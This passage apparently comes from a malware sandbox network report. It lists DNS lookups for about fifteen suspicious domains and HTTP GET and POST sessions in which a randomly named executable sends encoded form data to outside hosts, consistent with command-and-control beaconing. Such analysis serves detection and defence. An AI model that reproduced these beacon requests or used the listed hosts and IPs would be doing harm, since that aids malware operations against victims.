                                                                    Dec 5, 2024 09:46:46.664366961 CET4975880192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:46.680783033 CET8049758154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:46.680836916 CET4975880192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:46.680866957 CET8049758154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:46.680907965 CET4975880192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:46.784284115 CET8049758154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:46.784347057 CET4975880192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:47.683188915 CET4975980192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:47.803061962 CET8049759154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:47.803678036 CET4975980192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:47.818855047 CET4975980192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:47.938694000 CET8049759154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:49.320276976 CET4975980192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:49.339220047 CET8049759154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:49.339238882 CET8049759154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:49.339678049 CET4975980192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:49.339678049 CET4975980192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:49.440260887 CET8049759154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:49.440567970 CET4975980192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:50.340821981 CET4976080192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:50.460640907 CET8049760154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:50.460733891 CET4976080192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:50.479295969 CET4976080192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:50.599144936 CET8049760154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:50.599179983 CET8049760154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:51.992855072 CET4976080192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:52.001822948 CET8049760154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:52.001878023 CET8049760154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:52.002098083 CET4976080192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:52.002098083 CET4976080192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:52.112945080 CET8049760154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:52.113085032 CET4976080192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:53.010510921 CET4976180192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:53.130770922 CET8049761154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:53.131067991 CET4976180192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:53.139818907 CET4976180192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:53.259605885 CET8049761154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:54.675735950 CET8049761154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:54.675756931 CET8049761154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:54.675852060 CET4976180192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:54.678883076 CET4976180192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:54.798728943 CET8049761154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:47:00.383096933 CET4976280192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:00.503037930 CET8049762194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:00.503114939 CET4976280192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:00.526082993 CET4976280192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:00.646018028 CET8049762194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:01.837007999 CET8049762194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:01.837025881 CET8049762194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:01.837044954 CET8049762194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:01.837078094 CET4976280192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:01.837109089 CET8049762194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:01.837770939 CET4976280192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:02.039045095 CET4976280192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:03.174791098 CET4976380192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:03.294687033 CET8049763194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:03.295020103 CET4976380192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:03.727638960 CET4976380192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:03.847785950 CET8049763194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:04.619647980 CET8049763194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:04.619810104 CET8049763194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:04.619827032 CET8049763194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:04.619904041 CET4976380192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:04.620053053 CET8049763194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:04.620094061 CET4976380192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:05.242216110 CET4976380192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:06.260871887 CET4976480192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:06.380755901 CET8049764194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:06.380887985 CET4976480192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:06.796376944 CET4976480192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:06.916348934 CET8049764194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:06.916385889 CET8049764194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:07.713207006 CET8049764194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:07.713260889 CET8049764194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:07.713274956 CET8049764194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:07.713304043 CET8049764194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:07.713339090 CET4976480192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:07.713413000 CET4976480192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:08.304770947 CET4976480192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:09.324244022 CET4976580192.168.2.8194.58.112.174
                                                                    Dec 5, 2024 09:47:09.444212914 CET8049765194.58.112.174192.168.2.8
                                                                    Dec 5, 2024 09:47:09.444318056 CET4976580192.168.2.8194.58.112.174
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 5, 2024 09:43:25.719464064 CET6223453192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:43:26.348073006 CET53622341.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:43:42.806971073 CET4923553192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:43:43.657027006 CET53492351.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:43:58.433049917 CET5719753192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:43:59.145210028 CET53571971.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:44:13.385675907 CET5759653192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:44:14.132337093 CET53575961.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:44:28.590480089 CET5148653192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:44:29.008097887 CET53514861.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:44:43.418344021 CET6333453192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:44:43.936239004 CET53633341.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:44:58.186949968 CET5797053192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:44:58.812783957 CET53579701.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:45:13.530436993 CET6080553192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:45:14.513155937 CET53608051.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:45:28.980300903 CET5148353192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:45:29.691615105 CET53514831.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:45:43.933278084 CET5945753192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:45:44.514508009 CET53594571.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:45:58.996692896 CET5093853192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:45:59.488550901 CET53509381.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:46:13.732686996 CET5231753192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:46:14.308746099 CET53523171.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:46:28.903099060 CET5919253192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:46:29.898646116 CET5919253192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:46:30.031631947 CET53591921.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:46:30.036029100 CET53591921.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:46:44.496903896 CET6360853192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:46:45.014050961 CET53636081.1.1.1192.168.2.8
                                                                    Dec 5, 2024 09:46:59.684895039 CET6136553192.168.2.81.1.1.1
                                                                    Dec 5, 2024 09:47:00.380203009 CET53613651.1.1.1192.168.2.8
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 5, 2024 09:43:25.719464064 CET192.168.2.81.1.1.10x8231Standard query (0)www.bagatowcannabis.cloudA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:43:42.806971073 CET192.168.2.81.1.1.10x9adbStandard query (0)www.8600228.xyzA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:43:58.433049917 CET192.168.2.81.1.1.10x42d1Standard query (0)www.remedies.proA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:13.385675907 CET192.168.2.81.1.1.10xd5cfStandard query (0)www.officinadelpasso.shopA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:28.590480089 CET192.168.2.81.1.1.10xb2e8Standard query (0)www.liveplah.liveA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:43.418344021 CET192.168.2.81.1.1.10xd6dStandard query (0)www.appsolucao.shopA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:58.186949968 CET192.168.2.81.1.1.10xfecbStandard query (0)www.cg19g5.proA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:13.530436993 CET192.168.2.81.1.1.10x1360Standard query (0)www.kuyubak.onlineA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:28.980300903 CET192.168.2.81.1.1.10xfe10Standard query (0)www.acond-22-mvr.clickA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:43.933278084 CET192.168.2.81.1.1.10x4239Standard query (0)www.vpnto.netA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:58.996692896 CET192.168.2.81.1.1.10x1f87Standard query (0)www.avalanchefi.xyzA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:13.732686996 CET192.168.2.81.1.1.10xfc88Standard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:28.903099060 CET192.168.2.81.1.1.10x39dfStandard query (0)www.beythome.onlineA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:29.898646116 CET192.168.2.81.1.1.10x39dfStandard query (0)www.beythome.onlineA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:44.496903896 CET192.168.2.81.1.1.10x21c3Standard query (0)www.d48dk.topA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:59.684895039 CET192.168.2.81.1.1.10x836aStandard query (0)www.fantastica.digitalA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 5, 2024 09:43:26.348073006 CET1.1.1.1192.168.2.80x8231No error (0)www.bagatowcannabis.cloudbagatowcannabis.cloudCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:43:26.348073006 CET1.1.1.1192.168.2.80x8231No error (0)bagatowcannabis.cloud81.2.196.19A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:43:43.657027006 CET1.1.1.1192.168.2.80x9adbNo error (0)www.8600228.xyz103.249.106.91A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:43:59.145210028 CET1.1.1.1192.168.2.80x42d1No error (0)www.remedies.pro13.248.169.48A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:43:59.145210028 CET1.1.1.1192.168.2.80x42d1No error (0)www.remedies.pro76.223.54.146A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:14.132337093 CET1.1.1.1192.168.2.80xd5cfNo error (0)www.officinadelpasso.shopofficinadelpasso.shopCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:14.132337093 CET1.1.1.1192.168.2.80xd5cfNo error (0)officinadelpasso.shop195.110.124.133A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:29.008097887 CET1.1.1.1192.168.2.80xb2e8No error (0)www.liveplah.live209.74.77.107A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:43.936239004 CET1.1.1.1192.168.2.80xd6dNo error (0)www.appsolucao.shopappsolucao.shopCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:43.936239004 CET1.1.1.1192.168.2.80xd6dNo error (0)appsolucao.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:44:58.812783957 CET1.1.1.1192.168.2.80xfecbNo error (0)www.cg19g5.pro154.88.22.105A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:14.513155937 CET1.1.1.1192.168.2.80x1360No error (0)www.kuyubak.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:14.513155937 CET1.1.1.1192.168.2.80x1360No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:14.513155937 CET1.1.1.1192.168.2.80x1360No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:29.691615105 CET1.1.1.1192.168.2.80xfe10No error (0)www.acond-22-mvr.click199.59.243.227A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:44.514508009 CET1.1.1.1192.168.2.80x4239No error (0)www.vpnto.net91.226.30.3A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:59.488550901 CET1.1.1.1192.168.2.80x1f87No error (0)www.avalanchefi.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:45:59.488550901 CET1.1.1.1192.168.2.80x1f87No error (0)www.avalanchefi.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:14.308746099 CET1.1.1.1192.168.2.80xfc88No error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:30.031631947 CET1.1.1.1192.168.2.80x39dfNo error (0)www.beythome.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:30.031631947 CET1.1.1.1192.168.2.80x39dfNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:30.031631947 CET1.1.1.1192.168.2.80x39dfNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:30.036029100 CET1.1.1.1192.168.2.80x39dfNo error (0)www.beythome.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:30.036029100 CET1.1.1.1192.168.2.80x39dfNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:30.036029100 CET1.1.1.1192.168.2.80x39dfNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:45.014050961 CET1.1.1.1192.168.2.80x21c3No error (0)www.d48dk.topd48dk.topCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 09:46:45.014050961 CET1.1.1.1192.168.2.80x21c3No error (0)d48dk.top154.23.184.207A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 09:47:00.380203009 CET1.1.1.1192.168.2.80x836aNo error (0)www.fantastica.digital194.58.112.174A (IP address)IN (0x0001)false
                                                                    • www.bagatowcannabis.cloud
                                                                    • www.8600228.xyz
                                                                    • www.remedies.pro
                                                                    • www.officinadelpasso.shop
                                                                    • www.liveplah.live
                                                                    • www.appsolucao.shop
                                                                    • www.cg19g5.pro
                                                                    • www.kuyubak.online
                                                                    • www.acond-22-mvr.click
                                                                    • www.vpnto.net
                                                                    • www.avalanchefi.xyz
                                                                    • www.amayavp.xyz
                                                                    • www.beythome.online
                                                                    • www.d48dk.top
                                                                    • www.fantastica.digital
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.84970881.2.196.19805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:43:26.486388922 CET526OUTGET /zzs5/?t8=erepa0aHg&dpy4vDKP=S2OsCDyvlLRi8QWYXg1pYm60P988fDuoEbyrPuxNzPrnmbTjDj97FaXU9n32cQowhVlW8PNou7nXPbuRJkerLzsl2XtEg5/IjfyZCmafOy2/D+uD8ZFJuIO6v1d/wwnCHw== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.bagatowcannabis.cloud
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:43:27.768527031 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:43:27 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.849709103.249.106.91805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:43:43.860748053 CET774OUTPOST /1aqh/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.8600228.xyz
                                                                    Origin: http://www.8600228.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.8600228.xyz/1aqh/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 42 49 58 6c 46 55 49 56 66 38 35 69 58 2f 2f 50 30 58 67 54 61 34 34 6c 70 76 41 35 52 77 73 51 7a 6a 51 53 6b 4f 37 55 69 35 6e 31 36 48 4b 74 50 72 58 72 36 63 45 6d 44 66 75 59 35 42 45 76 2f 43 2f 6f 37 37 42 37 50 4e 74 45 64 72 35 47 44 78 61 65 72 55 57 4d 4d 66 6e 2f 7a 78 56 6a 69 70 45 63 70 4c 47 58 4d 42 67 31 73 78 6e 6c 45 4a 30 35 59 53 72 6c 71 4a 67 62 2f 6f 4c 49 44 72 50 51 68 6d 54 54 31 48 64 66 65 34 6e 54 42 4a 6b 61 50 56 59 34 44 64 33 38 63 66 71 7a 51 69 51 41 4e 42 69 38 46 6d 63 6d 76 37 68 54 34 38 65 6f 38 37 4c 44 4a 51 38 4c 70 46 30 58 79 42 74 37 53 6e 4d 3d
                                                                    Data Ascii: dpy4vDKP=BIXlFUIVf85iX//P0XgTa44lpvA5RwsQzjQSkO7Ui5n16HKtPrXr6cEmDfuY5BEv/C/o77B7PNtEdr5GDxaerUWMMfn/zxVjipEcpLGXMBg1sxnlEJ05YSrlqJgb/oLIDrPQhmTT1Hdfe4nTBJkaPVY4Dd38cfqzQiQANBi8Fmcmv7hT48eo87LDJQ8LpF0XyBt7SnM=
                                                                    Dec 5, 2024 09:43:45.332259893 CET190INHTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:43:45 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.849710103.249.106.91805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:43:46.595088005 CET794OUTPOST /1aqh/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.8600228.xyz
                                                                    Origin: http://www.8600228.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.8600228.xyz/1aqh/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 42 49 58 6c 46 55 49 56 66 38 35 69 57 66 50 50 34 51 55 54 53 34 34 6d 33 2f 41 35 61 51 73 55 7a 6a 63 53 6b 4d 4c 36 69 4c 7a 31 37 6d 36 74 4a 61 58 72 35 63 45 6d 58 76 75 5a 68 68 45 61 2f 43 6a 65 37 35 46 37 50 4c 42 45 64 75 39 47 44 41 61 64 70 45 57 43 45 2f 6e 39 38 52 56 6a 69 70 45 63 70 4c 69 78 4d 42 34 31 73 42 58 6c 45 6f 30 32 57 79 72 6d 67 70 67 62 30 49 4c 55 44 72 50 2b 68 6e 50 70 31 45 6c 66 65 34 58 54 42 63 51 64 46 56 59 36 48 64 32 55 59 50 76 41 58 79 5a 37 50 6a 4c 63 4d 48 41 5a 6a 74 51 35 69 65 57 75 2f 37 6a 6f 4a 54 55 39 73 79 70 2f 6f 69 39 4c 4d 77 59 58 37 51 76 76 4d 42 62 56 57 41 4b 6b 37 72 38 61 6e 70 6c 61
                                                                    Data Ascii: dpy4vDKP=BIXlFUIVf85iWfPP4QUTS44m3/A5aQsUzjcSkML6iLz17m6tJaXr5cEmXvuZhhEa/Cje75F7PLBEdu9GDAadpEWCE/n98RVjipEcpLixMB41sBXlEo02Wyrmgpgb0ILUDrP+hnPp1Elfe4XTBcQdFVY6Hd2UYPvAXyZ7PjLcMHAZjtQ5ieWu/7joJTU9syp/oi9LMwYX7QvvMBbVWAKk7r8anpla
                                                                    Dec 5, 2024 09:43:48.095791101 CET190INHTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:43:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.849711103.249.106.91805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:43:49.255536079 CET1811OUTPOST /1aqh/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.8600228.xyz
                                                                    Origin: http://www.8600228.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.8600228.xyz/1aqh/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
